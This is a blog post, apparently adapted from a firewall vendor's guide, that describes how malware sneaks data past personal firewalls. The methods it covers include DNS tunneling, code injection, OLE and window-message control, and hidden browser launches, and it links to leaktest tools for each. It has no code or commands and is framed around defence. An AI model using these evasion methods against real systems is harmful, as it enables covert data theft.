Penetration techniques – Part 2

Continuing the series from Agnitum firewall guide:
3 . Application window control
Windows allows applications to exchange window messages between processes. Malicious processes can get control over other network-enabled applications sending them window messages and imitating user input from keyboard and mouse clicks. The example of using this technique is Breakout leaktest (http://www.firewallleaktester.com/leaktest16.htm).
Here the point is program interactivity through the SendMessage, PostMessage API, and so on. This technique is sometimes used for legitimate inter-process interactivity, but can likewise be used for nefarious purposes by perpetrators.
4 . Active Desktop modification
Installing the specific HTML file for Active Desktop, malicious processes can transfer private data on behalf of Windows Explorer. The example of using this technique is Breakout leaktest (http://www.firewallleaktester.com/leaktest16.htm).
Outpost Firewall Pro controls such attempts to steal data by bamboozling the firewall.

5 . DNS query submission
DNS Client service contains potential vulnerability called DNS tunneling. The main point is that malicious code can transfer and receive any information using correct DNS packets to the correctly configured operating DNS server. The example of using this technique is DNSTester leaktest (http://www.klake.org/~jt/dnshell/).
Outpost Firewall Pro performs double verification of access to the DNS Client service, providing a more secure system. This enables control access to DNS API even with the DNS Client service on, benefiting users who, out of compatibility concerns, cannot disable this service themselves. This functionality allows assigning permissions to a specific process for using the DNS Client service.
6. Application launch with URL
Malicious processes can launch the default web browser with a pre-configured web address in a hidden window, making the firewall believe a legitimate action is taking place. Firewalls that explicitly trust an application without looking beyond on who actually launched it in the first place and what additional connection parameters are supplied are unable to challenge the technique, meaning sensitive data could leave the computer past them. The examples of using this technique are Tooleaky and Ghost leak tests (http://www.firewallleak tester.com/leak test2.htm, http://www.firewallleak tester.com/leak test13.htm).
7. Application launch with command line parameters
Several firewalls are exposed to a vulnerability of a predatory code launching the default web browser with command-line parameters, allowing to circumvent the existing protection because the firewall is made to believe the legitimate application is performing the legitimate actions. However, in those command-line parameters some piece of private or critical data may be contained, along with the host name as a target recipient of thereof. The example of using such technique is Wallbreaker leaktest (http://www.firewallleaktester.com/leaktest11.htm).
8. Critical registry entry modification
Malicious processes can modify registry to get network access on behalf of other application, for example, Windows Explorer. The example of using this technique is Jumper leaktest (http://www.firewallleaktester.com/leaktest17.htm).
9. OLE application control
A relatively new technique to control applications’ activity through the OLE mechanism (a short form of Object Linking and Embedding command) – a Windows’ mechanism which allows one program to manage the behavior of another program on the computer. It uses the technique of OLE intercommunication to exchange data and commands between applications, for example, to manage activity of the Internet Explorer web browser so that it can send user-specified data to the remote location. The example of using this technique is PCFlank leaktest (http://www.pcflank.com/PCFlankLeaktest.exe).
10. Process memory modification
Several Trojan horses and viruses use sophisticated techniques that let them alter the code of trusted applications running in memory and thereby bypass the system security perimeter and perform their malicious activities. This is also known as code injection or copycat vulnerability. The examples of using this technique are Thermite and Copycat leaktests (http://www.firewallleaktester.com/leaktest8.htm, http://www.firewallleaktester.com/leaktest9.htm).
For example, Visual Studio 2005 would be able to modify memory, while the “copycat.exe” leak test would be disallowed from doing so. This feature protects against even “unknown” malware not detected by antivirus and anti-spyware vendors.
11. Low-level network access
Some network drivers allow direct access to network adapter bypassing the standard TCP stack. These drivers can be used by sniffers and other malicious programs to get low-level network access and pose an additional risk for the system as traffic passing through them cannot be screened by a firewall. The example of using this technique is MBtest leak test (http://www.firewallleak tester.com/leak test10.htm).
This feature strengthens the overall network security level preventing outbound data leakage. The user is able to control an application’s attempts to open a network-enabled driver, meaning that without the user’s authorization, an application is not able to send even the ARP or IPX data.

Leave a Reply

Your email address will not be published. Required fields are marked *